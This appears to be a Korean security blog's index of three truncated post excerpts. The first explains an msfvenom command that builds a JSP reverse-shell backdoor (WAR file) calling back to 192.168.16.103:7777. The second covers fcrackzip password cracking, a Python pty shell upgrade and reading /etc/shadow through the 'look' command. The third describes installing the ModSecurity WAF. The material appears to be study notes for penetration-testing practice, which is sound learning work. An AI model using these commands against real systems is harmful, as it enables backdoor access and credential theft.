MIN

msfvenom: 리버스쉘을 만드는 도구입니다. 이 도구는 원하는 모양과 기능을 가진 백도어를 만들어 줍니다.-p java/jsp_shell_reverse_tcp: 백도어의 종류를 정하는 부분입니다.java/jsp: "이 백도어는 자바 웹사이트에 심을 거야" 라고 지정하는 것입니다.shell_reverse_tcp: "백도어가 심어진 컴퓨터가 나에게 거꾸로 연락을 하도록 만들어줘"라는 기능입니다.LHOST=192.168.16.103 LPORT=7777: 백도어가 연락할 주소를 지정하는 부분입니다.LHOST=192.168.16.103: "백도어는 192.168.16.103 이 주소로 연락해야 해"LPORT=7777: "연락할 때 포트 번호는 7777번을 사용해야 해"-f war -o revshell.war..

fcrackzip은 ZIP 파일의 비밀번호를 해독하는 도구로써,무차별 대입 공격(Brute-force attack) 이나,사전 공격(Dictionary attack)방식을 사용해서 비밀번호를 찾아낸다. 파이썬의 pty 모듈을 이용해 /bin/bash라는 새로운 터미널 세션을 생성→ 불안정한 셸 세션 위에서 완전한 기능을 갖춘 /bin/bash 셸을 다시 생성하여, 더 안정적이고 사용하기 편리한 터미널 환경 구축 look:이 명령어는 특정 단어를 사전 파일(words)에서 찾아주는 리눅스 유틸리티로써, 특정 조건과 옵션을 결합하면 이 명령어가 파일의 내용을 읽는 데 악용될 수 있다. look 명령어와 함께 LFILE=/etc/shadow를 사용하는 것은 look ..

WAF (Web Application Firewall)phase: 1 → request, headerphase: 2 → phase1 + bodyphase: 3 → phase2 + respond headerphase: 4 → phase3 + respond body # ModSecurity 모듈과 Apache 개발 도구를 설치[root@localhost ~] dnf install mod_security httpd-devel# 설치된 ModSecurity 모듈이 Apache 웹 서버에 잘 로드되었는지 확인[root@localhost ~] httpd -M | grep security# mod_security.conf의 path 확인[root@localhost ~] ls /etc/httpd/conf.d/READ..